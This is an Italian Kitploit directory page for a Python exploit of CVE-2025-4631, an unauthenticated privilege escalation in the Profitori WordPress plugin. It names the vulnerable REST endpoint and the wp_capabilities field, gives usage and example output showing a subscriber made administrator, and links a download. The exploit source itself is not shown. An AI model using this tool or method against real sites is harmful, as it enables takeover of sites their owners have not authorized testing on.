Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/nxploited/cve-2025-4631
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - Autorizzazione mancante per escalation di privilegi non autenticata

Vedi Repository
1111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2025-4631 - Exploit di escalation dei privilegi del plugin WordPress Profitori

📌 Riepilogo della vulnerabilità

Il plugin Profitori (versioni dalla 2.0.6.0 alla 2.1.1.3) è vulnerabile a escalation dei privilegi non autenticata a causa di un controllo delle capacità mancante nell'endpoint /wp-json/stocktend/v1/stocktend_object. Ciò consente a un attaccante remoto di aumentare i privilegi degli utenti esistenti (o crearne di nuovi) manipolando direttamente il campo meta wp_capabilities.

  • CVE: CVE-2025-4631
  • Punteggio CVSS: 9.8 (Critico)
  • Pubblicato: 30 maggio 2025
  • Ultimo aggiornamento: 31 maggio 2025

🛠️ Cosa fa questo script

Questo exploit in Python automatizza il processo di escalation dei privilegi:

  1. ✅ Controllando la versione del plugin tramite il file readme.txt.
  2. 🚀 Sfruttando l'endpoint REST API vulnerabile se viene rilevata una versione vulnerabile.
  3. 📡 Inviando il payload per elevare i privilegi di un utente ad Amministratore.
  4. 🧾 Stampando risultati dettagliati e formattati, incluse le credenziali dell'utente modificato.

Se il controllo della versione fallisce, l'exploit procede con cautela mostrando un avviso.


📸 Prova dell'exploit

Proof of Concept


💻 Utilizzo

root@kitploit:~
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

Esempio:

root@kitploit:~
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

Esempio di output:

root@kitploit:~
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : [email protected]
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛡 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : [email protected]

⚙️ Argomenti dello script


📂 Requisiti

  • Python 3.x
  • libreria requests

Installa tramite:

root@kitploit:~
pip install requests

⚠️ Disclaimer

Questo strumento è fornito solo per scopi educativi e di test autorizzati. Qualsiasi uso improprio di questo exploit contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione a testare è severamente vietato. Il creatore non è responsabile per eventuali danni o conseguenze legali derivanti da un uso improprio.


DA: Nxploited ( Khaled_Alenazi )

Scarica lo strumento
FlagDescriptionRequired
-u, --url🌐 URL di base del sito WordPress✅ Sì
-id🆔 ID dell'utente di cui elevare i privilegi✅ Sì
--email📧 Email fittizia da visualizzare❌ No
--name👤 Nome da visualizzare❌ No
--url_field🔗 Campo URL utente❌ No
--verbose🔍 Stampa la risposta JSON completa❌ No